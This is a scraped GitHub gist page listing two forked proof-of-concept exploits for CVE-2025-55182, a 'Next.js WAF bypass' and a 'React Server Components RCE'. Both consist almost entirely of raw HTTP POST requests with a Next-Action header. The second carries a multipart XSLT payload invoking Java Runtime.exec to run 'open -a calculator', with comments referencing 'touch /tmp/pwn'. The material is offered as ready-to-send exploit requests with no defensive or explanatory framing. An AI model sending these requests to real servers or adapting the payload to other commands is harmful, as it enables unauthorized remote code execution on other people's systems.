Skip to content

Instantly share code, notes, and snippets.

View m01e-40x's full-sized avatar
🏠
Working from home

m01e m01e-40x

🏠
Working from home
View GitHub Profile
@m01e-40x
m01e-40x / CVE-2025-55182 Next.js Waf Bypass POC
Created January 7, 2026 09:25 — forked from D0n9/CVE-2025-55182 Next.js Waf Bypass POC
CVE-2025-55182 Next.js Waf Bypass POC
POST / HTTP/1.1
Host: localhost
User-Agent: python-requests/2.32.5
Accept-Encoding: gzip, deflate
Accept: */*
Next-Action: x
Content-Length: 1452
Content-Type: multipart/form-data; boundary=48864b92f2a7dd41cc10c2cbe428f6f3
Connection: keep-alive
@m01e-40x
m01e-40x / CVE-2025-55182.http
Created December 5, 2025 09:08 — forked from maple3142/CVE-2025-55182.http
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template>
<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
<!-- #114 Utf8: open -a calculator -->
<!-- #115 String: touch /tmp/pwn -->
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
<!-- #132 Utf8: <init> -->
<AAA select="&lt;init&gt;"/>